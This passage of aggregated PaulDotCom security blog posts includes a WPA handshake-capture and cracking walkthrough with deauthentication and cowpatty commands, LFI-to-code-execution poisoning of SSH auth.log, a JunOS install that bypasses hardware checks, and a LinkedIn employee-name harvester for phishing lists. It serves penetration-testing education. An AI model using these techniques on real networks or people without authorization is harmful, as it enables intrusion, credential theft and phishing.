airodump-ng -c 9 -bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0 * Note D-Link-01.cap is where the capture of all traffic will go

Now open another window as we need to force a re-conect from the target (see the Note below)

aireplay-ng -a -c wlan0

Example:

airepley-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see at the top of the airodump window a wpa re-key, capture some traffic and exit you will have captured all the trafic in the D-Link01.cap file.

Part III

Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables

If using hashes (rainbow)

cowpatty -r -d -s

Example:

cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using Dictionary words:

cowpatty -r -f -s

Example:

cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note : If you are in an environment that has alot of cell phones like the iphone, (and they are using their wireless to connect to the network) we found these all go to sleep when their screen is turned off then their wireless ethernet card has a wake-up when the screen is activated. So you don't need to send de-auth all you got to do is hang around long enough for someone to touch their Iphone or whatever cell and have it wake up it's wireless and re-auth to the network, in other words there is the weakest link! -- LOL!

Happy Cracking

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY--I'm Out

~Mark Bennett

The PaulDotCom crew will be conducting random(Storm?) searches tonight with the aid of the EFF's Marcia Hofmann, who will give us an overview on our digital rights concerning search and seizure while traveling to the various [Def/Derby/Shmoo]Cons with sensitive research and intellectual property. Be sure to catch Episode 243 tonight, with random bag searches and possible full body scans starting at our regular time of 7:30 PM.

You can follow along and watch the show live via the link below:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 243 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

One of my favorite tools in my toolbox is the Vulnerability Scanner Nessus, in part because of it’s accuracy and because I’m part of one of the teams that works adding new cool stuff to it during the day. So I was super happy to see it included as part of Backtrack. Ever since I started working professionally in security Nessus has been part of my toolkit, once nessuscmd was out it became more integral in to my workflow because I could automate stuff for my customers. Before I had to always follow some weird procedures some times to get Nessus installed on the early versions of Backtrack and those procedures where always prone to breaking when I had to update to a latest version. I would like to share how to activate your copy of Nessus in Backtrack and some of the caveats that are present when activating it depending of your setup.

The first step is to have Bactrack installed as a virtual machine on your pentest/audit rig or installed locally on the hard drive of the machine. Do not try to activate by running it from the bootable DVD or from a USB Drive if you intend of using it on several physical machines because the registration process marries the activation to that specific host. So moving the VM from one host to another or the USB drive depending on how you configured Backtrack is more than likely to require re-activation of your copy of Nessus.

So one of the first thing you need to do if using a professional feed go to http://support.tenable.com and log in and go in to Manage Activation Codes and get your professional feed activation code. If you will be using a Home Feed you will have to go to http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code and register for a Home Feed, you will receive your activation code to the email you provided. Once you have the activation code you can proceed to activate it on your Backtrack Machine running as root:

root@bt:~# /opt/nessus/bin/nessus-fetch --register M4D0-EWWQ-1EZU-3KSN
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.

And yes the activation code in the example if a fake one for demonstration purposes only.

The next step is to add an admin user on this box so it can connect, create profiles, policies and lunch scans:

root@bt:~# /opt/nessus/sbin/nessus-adduser
Login : carlos
Login password : 
Login password (again) : 
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that carlos has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done : 
(the user can have an empty rules set)
Login             : carlos
Password         : ***********
This user will have 'admin' privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y] 
User added

Once the user has been created we can launch the Nessusd Daemon:

root@bt:~# /etc/init.d/nessusd start
Starting Nessus : .

Do keep in mind that since this is the first time you will be running the daemon it will take a while for it to load and configure all the checks. You can run top on the system and use the capital P to sort by CPU and then the capital R to change the order if needed, you will see that while loading nessusd will take close to 100% of you CPU and when finished it will normalize. Once it does you just need to connect with your web browser to https://localhost:8834/ or if connecting remotely the IP of the machine instead of localhost. Make sure that NoScript is set to allow script from localhost or the machines address depending your case.

Here is a wonderful post from Lanmaster53. You need to make this site one of your favorites.

Log poisoning has been used for years to upgrade local file inclusion vulnerabilities to remote command execution. In most cases, web server logs are used to execute such an attack. Most admins have become wise to the technique and do a decent job of preventing this. However, an equal amount of attention is not always paid to authentication logs.


I was recently attempting to exploit a LFI vulnerability on a pen test and was having no luck poisoning the web server logs. Previous scans of the target showed that an OpenSSH service was running. I took one last shot at the LFI vulnerability and below was the result. I was shocked to find that auth.log was world readable.





By default, OpenSSH makes an entry (consisting of the user name and other data) to auth.log for every authentication attempt made to the ssh daemon. Knowing this, I did some quick testing and found that I could inject php code into auth.log from the user name field of an ssh client by attempting to authenticate. The command took some time to get working right as bash requires finesse for processing special characters, but after some troubleshooting, I came up with the following:





One issue I encountered is that OpenSSH makes 3 entries containing the user name to auth.log for every authentication attempt. In the following example, only one authentication attempt was made, but, as you can see, it appears in the log 3 times.





The injected command will run 3 times unless php execution is terminated after the 1st command. I did this above with the exit; command. The unfortunate side effect is that you have one chance to get this right. Otherwise, you have to wait until the log cycles before you can make another attempt. Here is what the final product looked like with the addition of a pre-format tag for aesthetics.

As originally posted here.

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31

Many times when working with a client network or working on our own we have the need to test, document and validate certain networks configurations in a test environment. Sadly not many have the money to have one so as to test different scenarios so as to gage the impact that this changes might have on the production network. For a majority of configuration when it comes to system settings and routing a virtualized environment can be of great help, sadly anything ASIC or HW Specific configurations. On this blog post I will cover how to virtualize JunOS operating system to aide with testing and validating. I did this for a friend who needed to migrate the configuration of several of his Juniper Routers to a newer version of the OS and Hardware and also asked me for recommendations for hardening the routers. I do have to say I really like JunOS specially since it is a full FreeBSD subsystem underneath to wish a user has access to.

Requirements

Software required to install JunOS on VMware:

• Download FreeBSD 4.11 mini ISO from FreeBSD ftp site Link
• M Series Router jinstall Domestic Signed tgz file, Export version does not provide SSH.
• Jweb tgz file for the version of JunOS being install

NOTE: Do not ask for Juniper images I will ignore those messages. You need a valid contract to obtain them.

Settings for Workstation 7.x

• On VMware Workstation:
• Create a New Virtual Machine.
• Select on the image the FreeBSD ISO image.
• Ensure that FreeBSD is selected as the operating system type.
• Make sure HDD is 4GB or higher and of type IDE for version 9.x and 10.x for version 11.x use 6GB or higher.
• For memory set initially 512MB for 9.x and after installation of jweb it can be changed to 256MB, for 10.x and 11.x set initial value to 1024MB and after install 512MB.
• After creation of VM and before installation open VMX file and sure that the SCSI devises presence settings be set to FALSE: scsi0.present = "FALSE"
  

Settings for VMWare ESX 4.x

On VMWare ESX and ESXi :

• Create a New Virtual Machine with Operating System Other -> FreeBSD 32-bits
• Make sure HDD is 4GB or higher and of type IDE for version 9.x and 10.x for version 11.x use 6GB or higher.
• "Select the Edit Virtual Machine Settings Before Completion" Check Box.
• Change the SCSI Controller to LSI Logic SAS
• For memory set initially 512MB for 9.x and after installation of jweb it can be changed to 256MB, for 10.x and 11.x set initial value to 1024MB and after install 512MB.
• Set in the CD Rom the FreeBSD 4.11 ISO and make sure that it is Connected before saving.

FreeBSD Installation

• Skip the kernel configuration and choose the standard installation.
• When prompted to use fdisk select OK.
• When you get to partitioning, allocate first the whole disk to BSD.
• Press c then OK for the other prompts and finish by selecting q.
• Select BootMrg as the boot manager.
• Create the disk slices as shown in the table below:

Slice	Name	Size
ad0s1a	/	2000M
ad0s1b	Swap	1024M
ad0s1e	/config	64M
ad0s1f	/var	Remaining Space

• / has to be a reasonable size or else you'll run out of space on /mnt.
• Choose 'Minimal' installation type and skip installing ports.
• After the base is installed it will ask you if you want to configure Ethernet settings, select yes and use DHCP to configure your NIC (em0), Write down the IP given by DHCP and set a Hostname for the server. This allow us to scp the jinstall file after reboot.
• Except for the DHCP on interface em0, choose "no" for everything else (IPv6. Linux compatibility, NFS, FTP, Inetd, TimeZone etc..)
• When asked to create a user create one called junos, set a password for it and add it to the group wheel. Ensure to put a password for the root account.
• After the installer completes it will reboot. Make sure that you have disconnected the CD so as to make sure the VM will not boot in to the CD again.
• scp to /var/tmp on the VM the jinstall file only, do not copy the jweb file yet since during installation the file system will be formatted and changed.

 $ scp jinstall-<version>-domestic-signed.tgz junos@<ip>:/var/tmp

• Once the file is there yo will SSH in to the server and use the su command to gain root privileges:

  $ su -

JunOS 9.6R1

Unpack the different parts of the installer and remove hash files used to validate the installer:

# cd /var/tmp/
# mkdir jinst
# cd jinst
# tar xvzf ../jinstall-9.6R1.13-domestic-signed.tgz
# rm *.md5 *.sha1 *.sig
# mkdir domestic
# cd domestic/
# tar xvzf ../jinstall-9.6R1.13-domestic.tgz
# mkdir pkgtools
# cd pkgtools
# ls
# tar xvzf ../pkgtools.tgz
 

Make sure that check for hardware always return true by replacing the checkpic command:

# cp /usr/bin/true bin/checkpic

Repackage the installer:

# tar cvzf ../pkgtools.tgz *
# cd ..
# rm -rf pkgtools
# tar cvzf ../jinstall-9.6R1.13-domestic.tgz *
# cd ..
# rm -rf domestic/
# cd jinst
# tar cvzf ../jinstall-9.6R1.13-domestic-signed.tgz *
# cd ..
# rm -rf jinst/

Install the package using pkg_add:

# pkg_add jinstall-9.6R1.13-domestic-signed.tgz
Adding jinstall...
sysctl: unknown oid 'hw.product.model'
sysctl: unknown oid 'hw.re.model'
sysctl: unknown oid 'hw.re.model'
sysctl: unknown oid 'hw.re.model'
WARNING:     This package will load JUNOS 9.6R1.13 software.
WARNING:     It will save JUNOS configuration files, and SSH keys
WARNING:     (if configured), but erase all other files and information
WARNING:     stored on this machine.  It will attempt to preserve dumps
WARNING:     and log files, but this can not be guaranteed.  This is the
WARNING:     pre-installation stage and all the software is loaded when
WARNING:     you reboot the system.
Saving the config files ...
Installing the bootstrap installer ...
WARNING:     A REBOOT IS REQUIRED TO LOAD THIS SOFTWARE CORRECTLY. Use the
WARNING:     'request system reboot' command when software installation is
WARNING:     complete. To abort the installation, do not reboot your system,
WARNING:     instead use the 'request system software delete jinstall'
WARNING:     command as soon as this operation completes.

DO NOT REBOOT, Ensure you can interact with JunOS on the VM Console:

# chmod +w /boot/loader.conf
# vi /boot/loader.conf

Add this line to the file:

console="vidconsole"

Reboot the device by entering the reboot command, the installation process will take several minutes and the router will reboot twice.

 

JunOS 10.4R1 and JunOS 11.1R1

This process is the same for 10.x and 11.x. Unpack the different parts of the installer and remove hash files used to validate the installer:

# cd /var/tmp/
# mkdir jinst
# cd jinst
# tar xvzf ../jinstall-9.6R1.13-domestic-signed.tgz
# rm *.md5 *.sha1 *.sig

Open in vi the +INSTALL file

# vi ./+INSTALL

Modify the variable re_name in the check_arch_compatibility() function as shown bellow, inside vi you can do a :/check_arch<enter> to go directly to it.

check_arch_compatibility()
{
    #re_name=`/sbin/sysctl -n hw.re.name 2>/dev/null`
    re_name='olive'
    if [ -z "$re_name" ]; then
        Error "hw.re.name sysctl not supported."
    fi

Continue unpacking the next level of the package:

# mkdir domestic
# cd domestic/
# tar xvzf ../jinstall-10.4R1.9-domestic.tgz

Open with vi +INSTALL and +REQUIRE and modify the variable re_name in the check_arch_compatibility() as done before. Unpack the pkgtools.tgz file and make the checkpic file always return true:

# mkdir pkgtools
# cd pkgtools
# tar xvzf ../pkgtools.tgz 
# cp /usr/bin/true bin/checkpic 

Repackage the installer:

# tar cvzf ../pkgtools.tgz *
# cd ..
# rm -rf pkgtools
# tar cvzf ../jinstall-10.4R1.9-domestic.tgz *
# cd ..
# rm -rf domestic
# tar cvzf ../jinstall-10.4R1.9-domestic-signed.tgz *
# cd ..
# rm -rf jinst

Install the package:

 # pkg_add jinstall-10.4R1.9-domestic-signed.tgz 
 Adding jinstall...
 sysctl: unknown oid 'hw.product.model'
 sysctl: unknown oid 'hw.re.model'
 sysctl: unknown oid 'hw.re.model'
 sysctl: unknown oid 'hw.re.model'
 WARNING:     This package will load JUNOS 10.4R1.9 software.
 WARNING:     It will save JUNOS configuration files, and SSH keys
 WARNING:     (if configured), but erase all other files and information
 WARNING:     stored on this machine.  It will attempt to preserve dumps
 WARNING:     and log files, but this can not be guaranteed.  This is the
 WARNING:     pre-installation stage and all the software is loaded when
 WARNING:     you reboot the system.
 Saving the config files ...
 Installing the bootstrap installer ...
 WARNING:     A REBOOT IS REQUIRED TO LOAD THIS SOFTWARE CORRECTLY. Use the
 WARNING:     'request system reboot' command when software installation is
 WARNING:     complete. To abort the installation, do not reboot your system,
 WARNING:     instead use the 'request system software delete jinstall'
 WARNING:     command as soon as this operation completes.

Ensure you can interact with JunOS on the VM Console, there is no need for this step with version 10.4 but recommended in case there is a change in any other 10.x package:

# chmod +w /boot/loader.conf
# vi /boot/loader.conf

Add this line to the file:

console="vidconsole"

Reboot the device by entering the reboot command, the installation process will take several minutes and the router will reboot twice.

Initial Configuration

On the console at login enter root and enter on the password prompt. Enter cli to enter in to command line interface of JunOS and enter:

% cli
> configure

Set the hostname for the router:

# set system host-name <router name>

Set the root password:

# set system root-authentication plain-text-password <enter>

Create a secondary admin user to use for SSH:

# set system login user <username> class super-user
# set system login user <username> authentication plain-text-password <enter>

Set an IP Address on the interface em0 so as to connect to the router:

# set interfaces em0 unit 0 family inet address <ip/mask>

Enable and set the SSH Version of the protocol to use to version 2:

# set system services ssh protocol-version v2

Enable Telnet:

# set system services telnet

Enable FTPD:

# set system services ftp

Set the default gateway:

# set routing-options static route 0.0.0.0/0 next-hop <Default Gateway IP>

Set the DNS Server to use:

# set system name-server <name server IP>

Save the configuration:

# commit

To get full list of software installed and version without paging:

> show version | no-more

To get full configuration:

> show configuration | no-more 

To get full configuration in XML format:

> show configuration | no-more | display xml

Install the Web Interface

Copy to the router the jweb file using scp and the secondary admin account created above:

> show configuration | no-more | display xml

SSH in to the router and run:

> request system software add /var/tmp/jweb-<version>-signed.tgz

After installer finishes execute a reboot of the router

> request system reboot 
Reboot the system ? [yes,no] (no) yes

It will take a while for the router to reboot since it is setting up the files for the web interface. Once the router is back up connect to it, enter configuration mode and enable the the web management system on the interface you configured:

# set system services web-management http interface em0.0
# commit

Dennis Antunes is happy to announce the release of gloodin_v0.2

This version features many improvements over the initial release. Most notably:

• The option to specify output format: first dot last, first initial last, etc.,
• Output file name
• Text to append/prepend: think email address, which would dovetail nicely with SET's mass mailer functionality
• Simple URL encoding so spaces, ampersands, no longer break my queries :)
• Error handling
• Basic help

gloodin in a nutshell:

gloodin is a python script that makes a large number of google queries along with the modifier "site:linkedin.com" to harvest thousands of potential employee names, going far beyond what a typical manual search would allow.

It achieves this by repeatedly searching for some very common first names, last names and titles, later stripping these out to grab all the rest. These names/terms are easily configurable by editing the included searchterms.txt, which is read in at run time.

For example, the following command will pull user names from the target organization; output them in a first initial dot last name format; append the email address of the target organization, and write the results out to the file gloodin_target_org:

./gloodin_v0.2 -t "target organization" -f fidl -a @target_org.com -o gloodin_target_org

Please contact me with any questions, suggestions, bugs etc. at stratmofo at gmail dot com.
Twitter: @dennisantunes
Blog: http://securityjuggernaut.blogspot.com/ The PaulDotCom team will be teaching Offensive Countermeasures at Black Hat July 30-31

Should the payment information be stored in your SIM card (where carriers have access to it) or in an NFC (Near Field Communications)? This is scary, once your credit card is stored in your phone, mobile attacks will EXPLODE. This will be the new way for attackers to get CC info. Gone will be the days of planting devices in the store. Attackers will now either attack your phone, or attack the carrier or mobile provider to get credit cards. This is bad given that some stats I read say that one in every two Americans will have smartphones, which may even be more than people with computers! We talked about this a few weeks ago. At the last RSA there was one reporter who sat in on a Mobile Security talk and came away with the feeling that security for mobile devices was not as bad as some people say it is. Shortly after there was a slew of malware available for download on the Android marketplace. There is just not much financial incentive for attackers to go after these devices yet. If we create a virtual wallet on them it is going to end poorly. Further, we cannot lose sight of the fact that many applications are running as root and there is little to no built-in security for these devices. Sure, it may not be that bad now. But any student of information security history can see where this is going. Job Security! All Aborad!!! PaulDotCom and John Strand Originally discussed during episode 242 John Strand will be teaching Offensive Countermeasures at Black Hat July 30-31 This blog post is brought to you by SecureIdeas... Because Kevin Johnson paid me $1.

Paul, Larry, and Carlos tell us how to use Nmap to perform stealthy host and service discovery on a network:

Drunken security news style:

Episode 242 Show Notes

Episode 242 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

Please note that we're recording Episode 242 on Friday at 8PM this week!

You can follow along and watch the show live via the link below:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 242 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

Wicked Clown sent in an interesting article today.

Look, this does not even count as "hacking." This is just too basic, to good to be true. However, there are some excellent points to be taken from this article. First, it shows how dangerous embedded device security can be. There is little to no security built into the systems that cops are using while on patrol.

Junior Brown: Proof that country music and The Highway Patrol can be awesome.

Also, we have services with no user ID or password. And this is on an “important” system. Was there even a basic test of this while it was in development?

There are just a couple of things that popped into my mind while reading this. First, this fits into the concept of "cyber-criminals" actually being nothing more than just criminals. Also, I could not help but think of the stickers, "This House is Protected By Smith and Weston."

I think cops could have a better sticker:

This computer is protected by Glock

John Strand will be teaching Offensive Countermeasures at Black Hat July 30-31

PaulDotCom will be presenting the debut of our 2-day Offensive Countermeasures class at Black Hat July 30-31.

Before we get into this too much please check out the following:
http://en.wikipedia.org/wiki/OODA_loop

The main issue with computer security and Cyber-Warfare today is there is very little that most organizations on our side are willing to do when it comes to taking any action against attackers. There are a number of good reasons for this, one being legal issues and collateral damage to intermediary systems. Another may be fear of angering the attackers. However, it is an aspect of computer security that needs to be addressed and we need to move on. Current AV, Firewall and IDS strategies are failing and will continue to fail.

Long story short, if we have overly stringent rules and our opponents do not, whom is going to win?

We have to get inside an attacker’s OODA loop and change the dynamics in such a way they did not expect.

Hence, offensive countermeasures should be considered. However, when we consider offensive countermeasures we need to get past the idea of "hacking back." PaulDotCom is running a class at Black Hat and we want people to understand that this class is beyond getting access to an attacker’s machine. A class focused on “hacking back’ would not sell well. There is little to no way you would be able to justify a class like that to management. Rather, Paul and I have been focusing on things that an organization can do that would make our lives as testers miserable. Consequently, the things we cover in this class will also make an attacker’s life more miserable as well. We have broken the class up into three sections: Annoyance, Attribution, and Attack, or the three A's. The reason we have done this is that we want you to be able to bring the things you have learned back to work and feel comfortable implementing some of them without having to get buy-in from a Lawyer. For example: Attribution. With Attribution we focus on how we can identify an attacker’s real IP address without "hacking" their system, even if they are coming through TOR. We will teach you how to do this using many of the same techniques used by almost all websites today. The point is, we do it without "hacking back."

So, this class is dedicated to finding ways to fight back and making our networks "hard-targets" to attack. It is also dedicated to finding ways to get attribution on who the attackers are and where they are coming from.

Finally, we want to illuminate the legal issues surrounding this topic. Time to fight FUD with fact. There is case law. Even the extreme example of “hacking back” has been done, it just requires a bit of research and finesse.

This class has 7 labs per day. You will also leave the class with the OCM VM that will have all of the tools from the class ready to go.

Cant wait to see you there.

-strandjs
PaulDotCom

IDLE scans allow an attacker to scan a victim and frame an inactive host on the internet. The attacker doesn't transmit packets directly to the victim, but instead uses the idle zombie to measure the victim's response to a spoofed packet. NMAP currently does this with the -sI command line option.

There is a very interesting paper out that discusses two new methods of performing idle scans. One of these methods can peer through a network firewall and scan devices on internal networks that are not directly reachable by the attacker. The paper is available for download here:
http://people.csail.mit.edu/costan/readings/usenix_papers/Ensafi.pdf

The paper introduces two new types of scans. The first, is based on RESET limiting and works similar to the current method of measuring differences in the IPID field performed by nmap. The second method uses changes in the "SYN cache" to scans hosts that are reachable by the ZOMBIE that are not directly accessible to the attacker. Here is a brief explanation of how these two new scans would work.

NEW IDLE SCAN#1 - Reset Rate Limiting Scans
Concept:
FREEBSD limits the number of RESET packets it will send in a given period of time. For simplicity, lets say that FreeBSD will only send 1 RESET per second. If I send that host a packet that should elicit a RESET and I don't get back the expected RESET back then I know it sent someone else a RESET in the same second causing the host to reach it's RESET limit. So if we find an idle FREEBSD host on the net with rate limiting turned on we can scan a third party victim using this behavior.

Overview of the scan technique:
1) Attacker spoofs the ZOMBIE IP in a SYN packet to the VICTIM
2) Attacker sends a SYN-ACK to the ZOMBIE
3) If the attacker get a RST back the port was CLOSED. If the attacker gets nothing back the port was OPEN.

To understand how this works let's look at an open and closed port scenario. In this case the ZOMBIE is any idle FREEBSD host on the internet with RESET rate limiting enabled.

Considering the following Open Port Scenario:
1) Attacker sends spoofed SYN packet from ZOMBIE to VICTIM with a destination port that he wants to scan
2) Since the port is open the VICTIM sends a SYN-ACK to the ZOMBIE
3) The ZOMBIE wasn't expecting the packet so it sends a RESET to the VICTIM and enables it's RST rate limiting timer preventing any further RESET packets.
4) The attacker sends a SYN-ACK from their real IP to the ZOMBIE. Since the ZOMBIE never send a SYN to the attacker the ZOMBIE should send a RESET back but because of the rate limit it does not and we get nothing back.

Here is the scenario for a closed port:
With a closed port the VICTIM will not respond with a SYN-ACK. It will send a RESET which will NOT cause the ZOMBIE to send a RESET.
1) Send spoofed packet from ZOMBIE to VICTIM with a SYN flag
2) Since the port is CLOSED the VICTIM sends a RESET to the ZOMBIE
3) The ZOMBIE will silently drop the RESET from the victim so his RST rate limit is unaffected allowing the ZOMBIE to respond to us with a RESET.
4) The attacker sends a SYN-ACK from their REAL IP to the ZOMBIE and we get a RESET back.

NEW IDLE SCAN #2 - SYN Cache scans
This scan is based on the fact that some modern TCP stacks will send SYN cookies after their HALF OPEN Connection queue is full. This scan has two things that are very different from other IDLE scans. 1) We are not spoofing packets from the ZOMBIE and sending them to the VICTIM like traditional IDLE scan methods. Instead, we are spoofing packets from the VICTIM and sending them to the ZOMBIE. This leads to a VERY interesting second difference. 2) We NEVER transmit a packet to the VICTIM. Not even spoofed packets! So the attacker doesn't have to be able to ROUTE to the victim as long as the ZOMBIE can. This means you could potentially use a firewall or other network device to scan devices on the DMZ or other internal networks that are not accessible to the attacker. Here is a high level overview of how it is supposed to work:

Overview:
1) Spoof the VICTIM and send a SYN to a ZOMBIE using the source port you want to scan on the VICTIM*
*Note traditional IDLE scans send the packets to the VICTIM from the ZOMBIE
2) Send a SYN to the ZOMBIE from your real address
3) If you get back a SYN cookie back from the ZOMBIE the port on the VICTIM was open. If it is a normal SYN-ACK back the port on the VICTIM was close.

Consider the following Open Port scenario:
1) Attacker spoof the VICTIM's IP sending a SYN packet to the ZOMBIE
2) The ZOMBIE sends a SYN-ACK to the VICTIM exhausting it's HALF-OPEN connection queue causing it to use SYN cookies for all any additional connection requests (pretend it had a connection queue of 1 for simplicity)
3) The attacker sends a SYN to the ZOMBIE from his real IP address.
4) Since the connection queue is full the ZOMBIE sends a SYN cookie
5) The attacker determines it is a SYN cookie and not a regular SYN based upon the fact that SYN cookies have some statistical anomalies in their ISNb and they are never retransmitted.

Closed Port
1) Attacker spoof the VICTIMs IP sending a SYN packet to the ZOMBIE
2) The ZOMBIE sends a SYN-ACK to the VICTIM exhausting its HALF-OPEN connection queue causing it to use SYN cookies for all any additional connection requests.
3) The VICTIM sends a RST to the to the ZOMBIE causing the ZOMBIE to remove the entry from his half open connection queue. Since the half open connection queue isn't full the VICTIM will respond with normal SYN-ACK and not SYN cookies to future requests.
3) The attacker sends a SYN to the ZOMBIE from his own IP address.
4) Since the connection queue is not full the ZOMBIE sends a normal SYN-ACK
5) The attacker determines it is a SYN-ACK and knows the port is CLOSED

Of course there is more to it than I try to explain here. But the paper is definitely worth a read so check it out!

Join me for SANS 560 vLive!! Monday - September 12, 2011 - Wednesday - October 19, 2011 Register Today!